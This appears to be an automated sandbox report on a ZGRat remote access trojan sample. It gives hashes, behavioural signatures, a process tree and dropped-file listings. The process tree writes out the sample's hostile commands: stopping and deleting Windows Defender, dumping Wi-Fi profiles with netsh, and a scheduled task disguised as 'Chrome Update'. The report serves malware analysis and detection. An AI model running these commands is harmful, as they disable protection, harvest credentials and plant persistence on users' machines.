Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-03-2024 03:56

General

  • Target

    d7d26e52666b2a4633daf1255b15f967.exe

  • Size

    505KB

  • MD5

    d7d26e52666b2a4633daf1255b15f967

  • SHA1

    07e603c3ae9f2e876acb2e35791f810b22621aff

  • SHA256

    b5783b1d56cb32dfd50a16fd41c70c72cef40ff6c3389242ff4e5bb4a2905413

  • SHA512

    2dc43bc611da3bed3404f8a91b76f4570f45992bda58798231c7aeaae4f8f87038556f0431d5a5de2724aeaaad48dae696637a7ff9ae8f37ce2d4d6e8f46c90d

  • SSDEEP

    12288:cppem0FZJWq+s4Kp6MssRN1j0PNeQXOEleiSMd2ZliWqmn:AYFZJWqCK0gRfj0PshQj22sn

Malware Config

Signatures

  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Nirsoft 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe
    "C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:916
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2864
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3232
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:5116
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3752
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3600
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1904
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2492
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2072
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3952
    • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2732
      • C:\Windows\System32\sc.exe
        "C:\Windows\System32\sc.exe" stop WinDefend
        3⤵
        • Launches sc.exe
        PID:4292
    • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:4532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:3712
    • C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe
      C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe
      2⤵
      • Checks computer location settings
      • Drops desktop.ini file(s)
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2956
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
            PID:2012
          • C:\Windows\SysWOW64\netsh.exe
            netsh wlan show profile
            4⤵
              PID:4316
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              4⤵
                PID:1660
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4504
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                4⤵
                  PID:4868
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show networks mode=bssid
                  4⤵
                    PID:4600
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Local\Temp\d7d26e52666b2a4633daf1255b15f967.exe"
                  3⤵
                  • Creates scheduled task(s)
                  PID:3752

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\4eb0e7c05f265bbe8dfb2c61977a599c\Admin@QMWIRSIY_en-US\System\Process.txt

              Filesize

              4KB

              MD5

              b54f543664a9c3f4a1e1a2bee6c85e40

              SHA1

              517ef002b279e78517e202c654887f565c3541a2

              SHA256

              2165f3d3f696bcd6168a5c72a51e861f35443a191bf430f69d1cbdfa25c23a34

              SHA512

              bc788520eab0634811db9fc5768e708d853f09521f876e836114811c1eea7e8574a7eef78f46ba01aaeaf8071a8e0c4b04bbb0e2bdb4ea4fe142eb03ed1b0354

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\d7d26e52666b2a4633daf1255b15f967.exe.log

              Filesize

              1KB

              MD5

              b5291f3dcf2c13784e09a057f2e43d13

              SHA1

              fbb72f4b04269e0d35b1d9c29d02d63dbc7ad07e

              SHA256

              ad995b51344d71019f96fc3a424de00256065daad8595ff599f6849c87ae75ce

              SHA512

              11c89caac425bccaa24e2bb24c6f2b4e6d6863278bf8a5304a42bb44475b08ca586e09143e7d5b14db7f1cd9adacd5358769e0d999dc348073431031067bd4d4

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

              Filesize

              2KB

              MD5

              6832ae680e8ddacc9752c84ff4ee94d5

              SHA1

              eba38e3a46f6a27ec29c567c6766ba57fe7954ba

              SHA256

              19c4f3bc855b449022b1baf50569236e2d844e3f323453291495de125f76e632

              SHA512

              9cea7dcd3b0bf6bb6c1fd15aea43312cb52926e2e61455fcb26a6dd82323e352b9960f4afe412891be2aba54230ef354772e5397df8c6100e5aab875247fa1ef

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

              MD5

              87ae313e10cb53a28b6e926040896504

              SHA1

              65d8ea8795de5f2554bde32982c4645cafce2975

              SHA256

              e65d941cc97de01c223a44d8ed55b046fed49afa8d319fac6a4acafd1550efc1

              SHA512

              5b21e0862f976a6df9c2e16713cfb0eae2278ae6b5a6ebf73d2ebe72203cf6fdd1ff4130f3994ca5a62625d952caac045b1de738e47821c555f16a06b864556e

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

              MD5

              d036a8f3e69e7efa81aecf2d11bee4a9

              SHA1

              7c91619a1cb5ec2b2f94baf617c195833881d8cb

              SHA256

              c7bb4c2e9f1f5df7dc77996ed1b9a2f42de3a5bf6824c0dbaffae35da6da7044

              SHA512

              70f8f4ba06a1303cebd4bbb5e7cf4e2c6ac244bd937851c0b04bd1276d9856cbf7bdfce14cff3f541458833f044dc54bb0fe4ad2f84df48b687b92f50496e323

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

              MD5

              96e9dc63612cd6ad6c2fe1ef4631eeeb

              SHA1

              302a9e81eb032b53d3c945785647e052b2aea127

              SHA256

              5c3f8d8e4189378d0c1ebb20d8e2fcf6dc4bb1efc0e35496c8dd14652381d14d

              SHA512

              0cecd406713a43f3a33914457c79dcdae2ced6e5c6f3d12b6f923554e7c5a6c0d6cc16b7360c8428c2d9c4da0fac7ad0bb892fd08bf2bb7f1dfc411488f55d4b

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

              MD5

              eb2cda4a7f5b4237155e1db715789180

              SHA1

              445362eaa2ad11aa615fe3f6898c5aca362a88d7

              SHA256

              509a00e7606051c00a624850069d975200fe665748a4b6ec2e26578ec6390a68

              SHA512

              9dedc5c65117965decb89d74d93ee4451f10f397d75d42702d90de6d821a307fa0d01a5617c19512aeb6d3605f0a0d7c6a8f7af260f9f6f7f44a940e5cb4cc91

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

              MD5

              28d6b8d8c5b9cf39b1012d3efd7dfe1e

              SHA1

              90f095e15c89480de7986f47b34e29063e2d41fd

              SHA256

              aefbd92d5afdf140a5d165ea90153f2df5a1c0107e6b0cc4bb84fb6946d5e5ad

              SHA512

              3c806b4bdb68747f43cab8745409445b88d70a9e8e05898c0b2b01c84b72fb1f3d6c277b59fbd5c49434735ebad99d6b0f742fcf1e86bf10900f0ff66a150808

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

              MD5

              ae6933dd36f2e12239e9156075075711

              SHA1

              168204c33aa0c5db190636fd2a6f0139caa359f6

              SHA256

              656b2f068c8a92fb5472b8db98d56f0b75bc5268da19d948adf844a4ee3500d5

              SHA512

              762482b7741f1bad0b2b2bf945b411cbfed350142b12f6512e1cc99bc6daf696a13713c216a99d57fbd869f3028675a9f670d3b8c951eb5da848efa8a6ee51a2

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

              MD5

              c9e739980cbbe02111adb4730cd87604

              SHA1

              b070e12f91016bcd3ab8c365f10857a7248fff05

              SHA256

              49a7ad33a7abe9571889555749fd4dcbcbffb7e554b012df5028d49381d694c2

              SHA512

              8686e119ad5abc260f69135b3b109a64e79bbffba3e1dfba0b3efe12c46341df4b9b88e70b5f11d26afa5836eae2e73f0b56609a59cf2d41a686f55a3c418e2c

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

              MD5

              bb9443b3374bae20db239c4a3d6b9844

              SHA1

              a025a25b27bc0f48674e6adcbce9531fd5f8ef2d

              SHA256

              102411ccfa52b3cd62ceecb6998f83e3aa590248c47701b236a306c8faf24322

              SHA512

              e37a72693f6bccfdbf26da11acd23b715757b7887a560ce05055c3481e78afda468931063026336ab589b77f412c62bdcf80eb89c40fe3f2690930394b665025

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              19KB

              MD5

              33edf2fc026eb6b691dffc6de8b63f8b

              SHA1

              19be8dc36c38d9326de36294e4958d6cc627b5d2

              SHA256

              da56a8d0ad153c6f9074d04d8378343ae6002a5a917e41f98ff0ef07bbb02ae3

              SHA512

              daff2714ac4f33b683af4b7bd919b72a1f62843b882ff12b2cf31fe58cbcd890bace0b77b9a3f1708251856e1c830ea3d59f7a68cf0fe79bfc752b341a8d538c

            • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe

              Filesize

              88KB

              MD5

              17fc12902f4769af3a9271eb4e2dacce

              SHA1

              9a4a1581cc3971579574f837e110f3bd6d529dab

              SHA256

              29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

              SHA512

              036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bybxkviq.2ap.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\bbea729f163e8efac8d5cd98f6dc2908\msgid.dat

              Filesize

              1B

              MD5

              cfcd208495d565ef66e7dff9f98764da

              SHA1

              b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

              SHA256

              5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

              SHA512

              31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

            • memory/916-200-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-186-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-226-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-224-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-222-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-220-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-218-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-216-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-230-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-214-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-212-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-210-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-232-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-208-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-206-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-204-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-202-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-52-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/916-169-0x00000000060C0000-0x0000000006136000-memory.dmp

              Filesize

              472KB

            • memory/916-234-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-198-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-67-0x0000000004DA0000-0x0000000004DB0000-memory.dmp

              Filesize

              64KB

            • memory/916-196-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-194-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-236-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-192-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-190-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-228-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-2359-0x0000000000810000-0x0000000000820000-memory.dmp

              Filesize

              64KB

            • memory/916-188-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-184-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-180-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-5-0x0000000004FF0000-0x0000000004FFA000-memory.dmp

              Filesize

              40KB

            • memory/916-182-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-171-0x0000000006070000-0x000000000608E000-memory.dmp

              Filesize

              120KB

            • memory/916-0-0x00000000003C0000-0x0000000000444000-memory.dmp

              Filesize

              528KB

            • memory/916-170-0x0000000006150000-0x00000000061C4000-memory.dmp

              Filesize

              464KB

            • memory/916-4-0x0000000004DA0000-0x0000000004DB0000-memory.dmp

              Filesize

              64KB

            • memory/916-172-0x0000000006330000-0x000000000639E000-memory.dmp

              Filesize

              440KB

            • memory/916-178-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-1-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/916-176-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-3-0x0000000004E10000-0x0000000004EA2000-memory.dmp

              Filesize

              584KB

            • memory/916-174-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-173-0x0000000006330000-0x0000000006399000-memory.dmp

              Filesize

              420KB

            • memory/916-2-0x0000000005490000-0x0000000005A34000-memory.dmp

              Filesize

              5.6MB

            • memory/1904-123-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/1904-111-0x00000000052B0000-0x00000000052C0000-memory.dmp

              Filesize

              64KB

            • memory/1904-110-0x00000000052B0000-0x00000000052C0000-memory.dmp

              Filesize

              64KB

            • memory/1904-109-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/2072-141-0x0000000000FF0000-0x0000000001000000-memory.dmp

              Filesize

              64KB

            • memory/2072-140-0x0000000000FF0000-0x0000000001000000-memory.dmp

              Filesize

              64KB

            • memory/2072-153-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/2072-139-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/2492-125-0x0000000004C20000-0x0000000004C30000-memory.dmp

              Filesize

              64KB

            • memory/2492-138-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/2492-124-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/2492-126-0x0000000004C20000-0x0000000004C30000-memory.dmp

              Filesize

              64KB

            • memory/2864-17-0x0000000005AB0000-0x0000000005B16000-memory.dmp

              Filesize

              408KB

            • memory/2864-23-0x0000000005EB0000-0x0000000006204000-memory.dmp

              Filesize

              3.3MB

            • memory/2864-6-0x0000000002960000-0x0000000002996000-memory.dmp

              Filesize

              216KB

            • memory/2864-7-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/2864-10-0x0000000005480000-0x0000000005AA8000-memory.dmp

              Filesize

              6.2MB

            • memory/2864-9-0x00000000029D0000-0x00000000029E0000-memory.dmp

              Filesize

              64KB

            • memory/2864-11-0x00000000053C0000-0x00000000053E2000-memory.dmp

              Filesize

              136KB

            • memory/2864-32-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/2864-18-0x0000000005C10000-0x0000000005C76000-memory.dmp

              Filesize

              408KB

            • memory/2864-8-0x00000000029D0000-0x00000000029E0000-memory.dmp

              Filesize

              64KB

            • memory/2864-24-0x0000000006240000-0x000000000625E000-memory.dmp

              Filesize

              120KB

            • memory/2864-25-0x0000000006290000-0x00000000062DC000-memory.dmp

              Filesize

              304KB

            • memory/2864-26-0x0000000007200000-0x0000000007296000-memory.dmp

              Filesize

              600KB

            • memory/2864-27-0x0000000006760000-0x000000000677A000-memory.dmp

              Filesize

              104KB

            • memory/2864-28-0x00000000067B0000-0x00000000067D2000-memory.dmp

              Filesize

              136KB

            • memory/2864-29-0x00000000086F0000-0x0000000008D6A000-memory.dmp

              Filesize

              6.5MB

            • memory/3232-35-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

              Filesize

              64KB

            • memory/3232-34-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/3232-48-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/3232-36-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

              Filesize

              64KB

            • memory/3600-94-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/3600-82-0x0000000004EC0000-0x0000000004ED0000-memory.dmp

              Filesize

              64KB

            • memory/3600-81-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/3712-2374-0x00000179EB710000-0x00000179EB732000-memory.dmp

              Filesize

              136KB

            • memory/3752-66-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/3752-68-0x0000000004FD0000-0x0000000004FE0000-memory.dmp

              Filesize

              64KB

            • memory/3752-80-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/3952-168-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/3952-156-0x0000000004990000-0x00000000049A0000-memory.dmp

              Filesize

              64KB

            • memory/3952-155-0x0000000004990000-0x00000000049A0000-memory.dmp

              Filesize

              64KB

            • memory/3952-154-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/3964-96-0x0000000005110000-0x0000000005120000-memory.dmp

              Filesize

              64KB

            • memory/3964-95-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/3964-108-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/5116-49-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/5116-65-0x0000000074530000-0x0000000074CE0000-memory.dmp

              Filesize

              7.7MB

            • memory/5116-62-0x00000000057F0000-0x0000000005B44000-memory.dmp

              Filesize

              3.3MB

            • memory/5116-50-0x00000000024D0000-0x00000000024E0000-memory.dmp

              Filesize

              64KB

            • memory/5116-51-0x00000000024D0000-0x00000000024E0000-memory.dmp

              Filesize

              64KB